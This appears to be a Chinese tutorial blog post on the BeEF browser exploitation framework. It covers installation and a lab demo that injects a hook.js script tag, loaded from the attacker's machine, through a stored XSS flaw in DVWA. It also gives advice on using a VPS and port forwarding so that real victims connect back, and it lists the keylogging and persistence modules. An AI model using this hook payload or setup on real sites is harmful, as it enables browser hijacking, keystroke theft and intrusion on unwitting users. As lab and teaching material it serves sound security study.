0x01 Beef簡介
BeEF是The Browser Exploitation Framework的縮寫。它是一種專注於Web瀏覽器的滲透測試工具。
beef管理、掛鈎web瀏覽器的過程:
生成交互paylaod的hook
服務器端:beef作為服務端管理,管理訪問運行了hook的客戶端
客戶端:運行與客戶端瀏覽器的 Javascript 腳本(hook),也就是beef生成的payload。
beef將運行了hook的web瀏覽器鈎住,進行管理
0x02攻擊手段
配合xss,將hook插入到存在xss的注入處;
直接誘使客戶端訪問含有 hook 的偽造站點
結合中間人攻擊注入 hook 腳本
0x03 用途
鍵盤記錄器
網絡掃描
瀏覽器信息收集
綁定 shell
與 metasploit 集成
等...
0x04 beef工具獲取
beef只支持Linux平台
獲取:
wget https://github.com/beefproject/beef/archive/master.zip
或:
git clone https://github.com/beefproject/beef
安裝配置查看:https://github.com/beefproject/beef/wiki/Installation
kali-linux自帶beef;
beef如果用於實戰的話,需要一台vps,也就是建立連接的時候要使受害機能訪問到beef,因此需要一個外網ip。
我的vps安裝beef的時候有點問題,那么我們可以使用本地kali的beef,開放服務后,對beef的服務端口進行端口轉發,轉發到我們外網的vps上,那么受害機訪問payload(hook)后就可以反向到我們的beef服務端了。
這里端口轉發可以使用frp、portfwd、ew等。
0x05使用
我在本地進行演示:
攻擊機kali:192.168.106.129
靶機DVWA:192.168.31.214
1.更改beef的默認用戶名密碼
beef的配置文件:/etc/beef-xss/config.yaml
beef的默認用戶名密碼為beef、beef,如果需要更改beef的用戶密碼,則在配置文件里面更改user和passwd的值
2.啟動
終端輸入beef-xss即可啟動beef服務端。
beef的服務端地址為:http://127.0.0.1:3000/ui/panel,啟動之后瀏覽器會自動打開網頁,進入登錄頁面,用戶密碼為默認的beef
登錄成功后,這里會顯示在線的主機和不在線的主機。在線的就是現在該主機瀏覽器執行了我們的JS腳本代碼,不在線的就是該主機曾經執行過我們的JS腳本代碼,但是現在叉掉了該頁面
3.插入腳本hook到靶機
然后我們的hook啟動的時候已經給出:
Web UI: http://127.0.0.1:3000/ui/panel [*] Hook: <script src="https://<IP>:3000/hook.js"></script> [*] Example: <script src="https://127.0.0.1:3000/hook.js"></script>
kali的地址為192.1618.106.129,那么靶機上插入的hook js腳本為:
<script src="https://192.168.106.129:3000/hook.js"></script>
在靶機DVWA上找一個xss漏洞,將hook插入到注入點:
留言提交后,靶機的瀏覽器就被beef鈎上了:
因為我kali虛擬機開的nat模式,本機連的wifi,因此beef上顯示的ip不是我wifi分配的ip,但就是我本機。
存儲型xss的話只要插入的hook js語句,那么管理員正常訪問他的站點就會觸發,然后上鈎。
0x06 beef管理
在beef上上鈎了的受害機,beef對其可以獲取到很多主機、瀏覽器信息
1、Details是瀏覽器信息詳情
2.logs模塊-鍵盤記錄
3.commands-命令模塊
Commands是你能對該瀏覽器進行哪些操作
主要模塊:
-Browsers - Exploits - Host - Persistence(持久) - Network
綠色圓圈:表示模塊適合目標瀏覽器,並且執行結果對客戶端不可見
紅色圓圈:表示模塊不適用與當前用戶,有些紅色模塊也可以正常執行
橙色圓圈:模塊可用,但結果對用戶可見(CAM 彈窗申請權限)
灰色圓圈:模塊未在目標瀏覽器上測試過
更多的請參照卿師傅的博客:https://blog.csdn.net/qq_17204441/article/details/90706415?ops_request_misc=%7B%22request%5Fid%22%3A%22158209161719724835856114%22%2C%22scm%22%3A%2220140713.130056874..%22%7D&request_id=158209161719724835856114&biz_id=0&utm_source=distribute.pc_search_result.none-task